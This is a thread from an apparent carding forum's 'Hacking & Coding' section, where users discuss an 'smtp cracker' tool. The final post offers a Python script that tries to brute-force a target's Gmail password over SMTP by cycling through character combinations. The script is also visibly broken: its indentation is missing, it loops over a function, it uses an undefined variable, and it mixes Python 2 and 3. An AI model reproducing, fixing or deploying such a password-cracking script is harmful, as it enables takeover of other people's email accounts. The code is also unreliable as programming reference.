Go Back   Carder.life > [en] International Forum > Hacking & Coding



Reply
 
Thread Tools Display Modes
  #1  
Old 01-31-2025, 07:12 AM

Kot1 Kot1 is offline
Join Date: Mar 2021
Posts: 0
Default


http://imgur.com/a/HXcyp
smtp cracker i think its coded in python get in touch
  #2  
Old 01-31-2025, 07:43 AM

negdwol119 negdwol119 is offline
Join Date: Apr 2024
Posts: 0
Default


Screenshot doesn't contain any info that helps in identifying the tool post the name if you have
  #3  
Old 01-31-2025, 08:06 AM

brave dumps brave dumps is offline
Join Date: Feb 2024
Posts: 0
Default


Is that all the info you got ?
  #4  
Old 01-31-2025, 08:27 AM

Bruklincitylin Bruklincitylin is offline
Join Date: Apr 2022
Posts: 1
Default


you can only brute force for smtp
  #5  
Old 01-31-2025, 08:40 AM

Bradega Bradega is offline
Join Date: Jan 2025
Posts: 0
Default


Looking for something like this?
Code:
import itertools 
import smtplib
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input("Enter Target's Address: ")
def print_perms(chars, minlen, maxlen):
for n in range(minlen, maxlen+1):
for perm in itertools.product(chars, repeat=n):
print(''.join(perm))
print_perms("abcdefghijklmnopqrstuvwxyz1234567890", 2, 4)
for symbols in print_perms:
try:
smtpserver.login(user, password)
print "[+] Password Cracked: %s" % symbols
break;
except smtplib.SMTPAuthenticationError:
print "[!] Password Inccorect: %s" % symbols



Reply

Tags
NULL


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On

Forum Jump




All times are GMT. The time now is 10:00 PM.